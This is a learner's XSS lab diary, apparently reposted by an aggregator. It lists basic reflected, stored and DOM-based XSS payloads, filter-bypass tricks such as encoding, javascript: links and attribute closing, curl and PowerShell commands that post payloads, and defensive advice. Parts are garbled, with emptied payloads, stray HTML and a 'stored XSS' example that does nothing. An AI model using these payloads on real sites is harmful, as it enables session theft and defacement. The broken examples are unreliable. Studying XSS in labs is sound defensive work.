Day 47 – XSS Lab Practice & WriteUp

By /

Listen to this Post

Today, I started by completing the Cross-Site Scripting (XSS) module on Hack The Box (HTB), where I learned all about the three main types of XSS—Reflected, Stored, and DOM-based—and how to exploit and defend against them. Then, I jumped into the XSS-Labs to put my learning into practice.

From Level 1 to Level 10, each challenge felt like solving a mini puzzle. At first, it was pretty straightforward—just inserting `` would trigger the alert. But as I progressed, things got trickier: bypassing filters, closing attributes, using pseudo-protocols, and even encoding payloads. Levels 8 and 9 were particularly challenging, but also incredibly rewarding once I figured them out! Afterward, I wrote detailed write-ups in both Chinese and English, which really helped solidify my understanding.

  • (CN) CSDN: https://lnkd.in/ggUqQtGj
  • (EN) GitHub: https://lnkd.in/gwC5YTKN

You Should Know:

1. Basic XSS Payloads

  • Reflected XSS: 
    <script>alert('XSS');</script>

    This is the simplest form of XSS, where the script is reflected off a web server.

  • Stored XSS: 

    <script>document.cookie</script>

    This payload is stored on the server and executed when other users access the affected page.

  • DOM-based XSS: 

    <img src="x" onerror="alert('DOM XSS')">

    This payload manipulates the Document Object Model (DOM) of a webpage.

2. Bypassing Filters

  • Encoding Payloads:

Use URL encoding or Unicode to bypass filters:

%3Cscript%3Ealert(1)%3C%2Fscript%3E
  • Using Pseudo-Protocols: 
    <a href="javascript:alert('XSS')">Click Me</a>

  • Closing Attributes: 

    "><script>alert('XSS')</script>

3. Advanced XSS Techniques

  • Exploiting Event Handlers: 

    <img src=x onerror=alert('XSS')>

  • Using SVG for XSS: 

    </p></li>
</ul>

<p><

svg/onload=alert('XSS')>
    • Bypassing CSP (Content Security Policy):
      Use JSONP endpoints or unsafe-eval to bypass CSP restrictions.

    4. Defending Against XSS

    • Input Validation:
      Always validate and sanitize user inputs on both client and server sides.

    • Output Encoding:

    Use libraries like OWASP ESAPI to encode outputs.

    • CSP Headers:
      Implement Content Security Policy headers to restrict script execution.

    5. Practice Commands

    • Linux Command to Test XSS:

    Use `curl` to test for XSS vulnerabilities:

    curl -X POST -d "input=<script>alert(1)</script>" http://example.com/form
    • Windows Command to Test XSS:

    Use `Invoke-WebRequest` in PowerShell:

    Invoke-WebRequest -Uri http://example.com -Method POST -Body "input=<script>alert(1)</script>"
    • Burp Suite:
      Use Burp Suite to intercept and modify requests to test for XSS vulnerabilities.

    What Undercode Say:

    Cross-Site Scripting (XSS) remains one of the most common and dangerous web vulnerabilities. By understanding the different types of XSS and practicing payloads, you can better defend against these attacks. Always remember to validate inputs, encode outputs, and implement robust security headers like CSP. Keep practicing and exploring advanced techniques to stay ahead in the cybersecurity game.

    Expected Output:

    • Reflected XSS Payload: ``
    • Stored XSS Payload: ``
    • DOM-based XSS Payload: ``
    • Linux Command: `curl -X POST -d “input=” http://example.com/form`
    • Windows Command: `Invoke-WebRequest -Uri http://example.com -Method POST -Body “input=“`

    References:

    • (CN) CSDN: https://lnkd.in/ggUqQtGj
    • (EN) GitHub: https://lnkd.in/gwC5YTKN

    References:

    Reported By: Lixinlovestudy Day – Hackers Feeds
    Extra Hub: Undercode MoN
    Basic Verification: Pass ✅

    Join Our Cyber World:

    💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: